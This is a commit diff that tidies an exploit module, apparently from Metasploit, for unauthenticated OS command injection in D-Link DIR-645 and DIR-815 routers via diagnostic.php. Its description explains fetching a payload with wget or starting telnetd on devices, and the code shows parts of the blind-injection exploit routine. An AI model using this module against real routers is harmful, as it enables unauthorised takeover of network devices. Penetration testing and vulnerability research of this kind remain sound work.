final cleanup for dlink_diagnostic_exec_noauth

jvazquez-r7 · jvazquez-r7 · commit 4f2e3f033964 · 2013-04-10T11:15:32.000+02:00
diff --git a/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb b/modules/exploits/linux/http/dlink_diagnostic_exec_noauth.rb
@@ -19,17 +19,18 @@ def initialize(info = {})
 		super(update_info(info,
 			'Name'        => 'DLink DIR-645 / DIR-815 diagnostic.php Command Execution',
 			'Description' => %q{
-					Some DLink Routers are vulnerable to OS Command injection.
-				On DIR-645 versions prior 1.03 you will NOT need credentials to the webinterface.
-				On DIR-645 version 1.03 you will need to login before executing commands. Fixed
-				with version 1.04.
-				There are different other DLink products also affected from this vulnerability.
-				DIR-300 rev B, DIR-600 are some examples of it. Not every device includes wget
-				which we need for deploying our payload. On such devices you could use the
-				cmd generic payload and try to start telnetd or execute other commands.
-				Since it is a blind os command injection vulnerability, there is no output
-				for the executed command when using the cmd generic payload. A ping command
-				against a controlled system could be used for testing purposes.
+					Some DLink Routers are vulnerable to OS Command injection in the web interface.
+				On DIR-645 versions prior 1.03 authentication isn't needed to exploit it. On
+				version 1.03 authentication is needed in order to trigger the vulnerability, which
+				has been fixed definitely on version 1.04. Other DLink products, like DIR-300 rev B
+				and DIR-600, are also affected by this vulnerability. Not every device includes
+				wget which we need for deploying our payload. On such devices you could use the cmd
+				generic payload and try to start telnetd or execute other commands. Since it is a
+				blind os command injection vulnerability, there is no output for the executed
+				command when using the cmd generic payload. A ping command against a controlled
+				system could be used for testing purposes. This module has been tested successfully
+				on DIR-645 prior to 1.03, where authentication isn't needed in order to exploit the
+				vulnerability.
 			},
 			'Author'      =>
 				[
@@ -66,7 +67,7 @@ def initialize(info = {})
 						}
 					],
 				],
-			'DefaultTarget'  => 1,
+			'DefaultTarget'  => 1
 			))
 
 		register_options(
@@ -97,8 +98,6 @@ def request(cmd,uri)
 	def exploit
 		downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
 		uri = '/diagnostic.php'
-		rhost = datastore['RHOST']
-		rport = datastore['RPORT']
 
 		if target.name =~ /CMD/
 			if not (datastore['CMD'])
@@ -108,9 +107,8 @@ def exploit
 			res = request(cmd,uri)
 			if (!res)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-			else
-				print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 			end
+			print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
 			return
 		end
 
